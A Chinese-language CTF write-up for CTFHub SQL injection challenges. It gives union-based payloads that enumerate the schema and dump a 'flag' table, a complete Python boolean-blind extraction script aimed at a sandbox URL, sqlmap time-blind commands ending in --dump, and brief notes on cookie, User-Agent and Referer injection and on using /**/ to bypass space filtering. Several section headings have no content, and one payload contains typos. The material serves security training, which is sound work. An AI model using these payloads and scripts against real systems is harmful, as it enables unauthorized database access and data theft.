整数型注入
基本步骤
- 检查是否存在注入
and 1=1 返回正确
and 1=2 返回错误
- 猜字段数
order by x
得出字段数
- 爆数据库名
? id=1 and 1=2 union select 1,database()
- 爆表名
? id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.rables where table _schema='sqli'
得到表名news,flag
- 爆列名
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
- 爆字段内容
?id=1 and 1=2 union select 1,group_concat(flag) from sqli.flag
解题
字符型注入
报错注入
布尔盲注
使用脚本
import requests
urlOPEN = 'http://challenge-5aaeb58d25ce5ac1.sandbox.ctfhub.com:10800' #换成自己环境的url
starOperatorTime = []
mark = 'query_success'
def database_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = urlOPEN+'/?id=if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
# print(url+'%23')
r = requests.get(url)
if mark in r.text:
name = name+i
print(name)
break
print('database_name:',name)
def table_name():
list = []
for k in range(0,4):
name=''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = urlOPEN+'/?id=if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
# print(url+'%23')
r = requests.get(url)
if mark in r.text:
name = name+i
break
list.append(name)
print('table_name:',list)
def column_name():
list = []
for k in range(0,3): #判断表里最多有4个字段
name=''
for j in range(1,9): #判断一个 字段名最多有9个字符组成
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url=urlOPEN+'/?id=if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
r=requests.get(url)
if mark in r.text:
name=name+i
break
list.append(name)
print ('column_name:',list)
def get_data():
name=''
for j in range(1,50): #判断一个值最多有51个字符组成
for i in range(48,126):
url=urlOPEN+'/?id=if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
r=requests.get(url)
if mark in r.text:
name=name+chr(i)
print(name)
break
print ('value:',name)
if __name__ == '__main__':
database_name()
table_name()
column_name()
get_data()
时间盲注
使用sqlmap
查库
python3 sqlmap.py -u http://challenge-c3a65482adf6bcfd.sandbox.ctfhub.com:10800/?id=1 --batch --technique T --dbs
查表
python3 sqlmap.py -u http://challenge-c3a65482adf6bcfd.sandbox.ctfhub.com:10800/?id=1 --batch --technique T -D sqli --tables
查字段
python3 sqlmap.py -u http://challenge-c3a65482adf6bcfd.sandbox.ctfhub.com:10800/?id=1 --batch --technique T -D sqli -T flag --columns
查值
python2 sqlmap.py -u http://challenge-c3a65482adf6bcfd.sandbox.ctfhub.com:10800/?id=1 --batch --technique T -D sqli -T flag -C flag --dump
MYSQL结构
同以前一样
使用sqlmap
cookie注入
手动注入
抓包修改cookie
闭合方式
UA注入
Refer注入
过滤空格
过滤了空格,我们使用/**/代替空格